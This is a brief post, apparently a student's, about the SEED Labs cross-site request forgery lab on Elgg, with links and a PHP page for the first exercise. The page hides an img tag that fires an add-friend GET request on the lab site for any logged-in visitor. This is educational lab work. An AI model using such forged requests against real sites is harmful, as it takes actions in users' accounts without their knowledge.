
Cross Site Script Forgery

Here is the link for the Cross Site Script Forgery lab at the SEEDLab:

https://seedsecuritylabs.org/Labs_16.04/Web/Web_CSRF_Elgg/

Click on the description link and you can get started. Here are some of my notes from the first few parts: https://drive.google.com/file/d/11ak1drp0wX7uOtLdGBB6Te-ZcRotCMeX/view?usp=sharing

Some of the code is supplied here: https://www.handsonsecurity.net/figurecode.html, which makes it a little easier. Here is also the index.php I wrote for the first exercise:




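<?php
# index.php for the first exercise: a page with two <img> tags.
print "<HTML>";
print "<BODY>";
# the visible image
print "<img src=\"boom.gif\">";
# add boby as a friend
# http://www.csrflabelgg.com/action/friends/add?friend=43&
# loading this "image" makes the browser send the add-friend GET request
print "<img src=\"http://www.csrflabelgg.com/action/friends/add?friend=43\">";
print "</BODY>";
print "</HTML>";
?>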

I downloaded this gif to use as boom.gif in the above php file:
